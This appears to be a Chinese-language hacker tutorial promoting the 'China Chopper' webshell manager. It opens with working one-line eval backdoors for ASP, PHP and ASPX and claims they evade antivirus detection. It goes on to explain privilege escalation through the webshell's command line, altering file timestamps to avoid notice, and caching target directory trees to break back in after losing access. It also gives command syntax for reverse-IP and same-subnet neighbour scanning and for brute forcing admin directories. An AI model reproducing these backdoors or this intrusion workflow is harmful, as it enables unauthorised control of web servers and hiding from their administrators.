中国菜刀高级使用方法总汇

Asp环境：<%evalrequest("a")%>

Php环境：<?php@eval($_POST['a']);?>

Aspx环境：<% @pageLanguage="Jscript"><%eval(Request.item["a"],"unsafe");%>

一个名不见经传的“中国菜刀”，就可以代替我那搜集了几年，大大小小几百个多种平台多种环境的脚本后门？，事实证明，我错了，原来“中国菜刀”不仅仅可以代替那些后门，而且他的功能超出我的想象，就让我慢慢说明吧。

1.就从最基本的讲起，你的脚本是不是经常被杀，你怎么变形都被杀，，传到服务器被杀导致被管理员发现，结果你的权限就没了，杀到你欲哭无泪。菜刀的一句话后门，可以避免这个问题，只有短短的一行代码，永远不会被查杀。

2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了，框架变形，字体变框框，点击菜单无效，这个是因为系统语言不兼容造成的，菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。

3.你是不是有很多webshell，你每次都拿记事本记下来，需要的时候，又去翻半天，弄得你很累很没脾气。有了“菜刀”，你可以很方便管理你的webshell，所有的记录都保存在加密的本地数据库里，而且支持webshell分类，让你管理得井井有条。菜刀不仅有临时锁定功能，方便你离开电脑的那小会时间不被别人偷你的webshell，也有加密功能，不输对密码，HOHO，偷了你的数据也没用。

4.再来说说数据库管理，这个是菜刀最最强大的功能，精通各平台主流数据库的作者，把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库，支持不是最主要的，功能强大，人性化才是最主要的，“菜刀”的数据库操作界面，内置了常用的数据库语句，非常直观的表列名浏览功能，自动显示表名，列名，查询语句，非常人性化的设计，更内置了不少自建的函数，方便不懂数据库的菜鸟，都能查阅数据库里的数据，再说个“菜刀”数据库管理的一个小技巧，对于access数据库，可以在菜刀的webshell操作界面，对着MDB文件点右键，点Access Management，就直接进入Access的数据库操作界面了，方便吧，嘿嘿！！

5.再说说提权这块，webshell的提权总是最让人关心的，说到提权，就不能说到webshell上的cmd执行了，有些朋友并不了解菜刀的自定义CMD路径功能，有两种方法可以设置指定的cmd路径，一就是在cmd操作界面，输入setp d:\cmd.exe，就可以了，或者把cmd.exe上传到目录，然后点右键,点virtual terminal file，就可以进入自定义CMD.EXE路径的命令行了，同样的，再给个cmd使用的小技巧，在菜刀的命令行里，可以使用cd等命令跳转目录，方便吧，嘿嘿！！嗯，另外，新版菜刀新增常用目录管理功能，你可以把你常用的目录或者提权的目录加进菜刀里，这样很方便你提权或者日常工作，是不是比那些固定了提权目录的脚本后门要牛B的多啊，哈哈。

6.还有菜刀的webshell上的文件功能功能，也是非常人性化的，文件夹和文件的图标完全模枋windows,，文件日期，文件大小，文件权限，一目了然，尤其是修改文件时间功能，非常的方便，直接对着要修改时间的文件点右键,modify the file time，然后在文件的时间那栏，输入时间，回车，就修改完了。当然，菜刀的文件管理还有新建，删除，上传，下载，编辑功能，这些大同小异，就不一一细说了。不过有个功能，还是要重点说明的，那就是目录缓存功能，菜刀可以把浏览过的webshell目录都缓存在本地，这样可以方便下次访问的时候更加快捷，最重要的是，当哪天你的权限丢了，起码你还有对方服务器的文件目录结构，方便再一次渗透。

说完大家都有的脚本后门功能，现在来说点特别的菜刀功能，非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器，再结合了作者之前的web管理软件等几个工具的优点，实在是大杀器的集合体。

1：蜘蛛爬行。我很喜欢用WVS，对于WEB安全这块，功能是非常的强大，我很喜欢里面的一个功能，目录爬行，可以把WEB站的文件目录结构以很直观的形式排列出来，很方便分析。我非常惊喜的发现，菜刀居然也有这个功能，叫蜘蛛爬行。

用法:

{spider} {url:http://www.baidu.com/}

设定爬行范围

{spider} {url:http://www.baidu.com/}{range:baidu.com}

跟WVS的功能完全一样，我上次上传webshell图片的时候，不知道脚本后门给传到哪个目录，结果用菜刀的蜘蛛爬行功能找出来了，真是强大。

2：旁注查询。在渗透的时候，旁注是非常关键的，不知有多少大站是死在他邻居的进攻下啊。你见过查询同服务器的所有域名，那你见过查询同C段的所有域名不，呵呵，菜刀就可以做到

用法:

查单一IP的绑定域名

{reverse_ip} {url:http://www.baidu.com/}

扫描本C段开放的WEB服务器，并查询绑定域名

{reverse_ip_c} {url:http://www.baidu.com/}

3:字典爆破功能。你是不是很喜欢webtool的目录扫描功能呢，既然菜刀是集大成之所有者，自然是不会少了这个功能的，而且功能更加强大。

用法：

{crack} {url:http://%s/admin/} {flag:HTTP/1.1200} {dict:list.txt}

{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1404} {dict:list.txt}

{crack} {url:http://www.baidu.com/%s/} {flag:successfully}{dict:list.txt}

%s为dict中的一行，flag:后面为返回的数据(含HTTP头部)中的特定关键字，加!!为不包含关键字为TRUE，否则包含关键字为TRUE, list.txt为当前目录下的文件，可设为绝对路径，注意：不要包含太多的行。

这个目录爆破功能，是非常灵活跟强大的，首先，可以根据返回的数据包自定义来判断目录是否存在，然后可以爆破已知目录的上级目录，举个例子，假如你知道你的目录是guanli，但是你是不知道guanli这个目录是在哪个目录里面，那么你可以

{crack} {url:http://www.baidu.com/%s/guanli/}{flag:HTTP/1.1 200} {dict:list.txt}

其实菜刀还是一个浏览器，真的，不骗你，菜刀的浏览器功能，非常简单，却非常实用，可以很方便的禁止或者开启网站的脚本、控件执行，图片显示开关，最最方便的，还是cookies编辑功能了，这个是非常重要的，谁用谁知道。菜刀的浏览器是可以直接post提交的，这个功能有什么用，相信黑黑们也不用我多说了吧。另外一个，就是自定义JS,这个据说也是很强大的，但我暂时还没用到这个功能。

总结一下，菜刀一直在完善，一直在更新，发展到现在，已经不仅仅是一个webshell管理器，可以说是一个大杀器的集合体，就算完全抛弃里面的webshell管理功能，菜刀也是一个很不错的浏览器，很不错的后台扫描工具，很不错的cookies编辑提交工具，很不错的文件管理工具，很不错的旁注软件，不单是方便各位黑客朋友使用，也很方便站长使用，毕竟里面的文件管理功能，上传下载，比FTP更加直观了，最重要的，菜刀的数据库管理功能，真的是前无古人，后无来者，非常非常方便，严重推荐大家使用。

另附作者的下一步开发计划，菜刀即将支持JSP，CFM等等，更加灵活，也考虑开放菜刀的协议跟接口，这样的话，大家可以自由写插件，也不局限于eval这样的一句话后门，另外，菜刀也将继续保持以人为本的人性化设计，会更加灵活！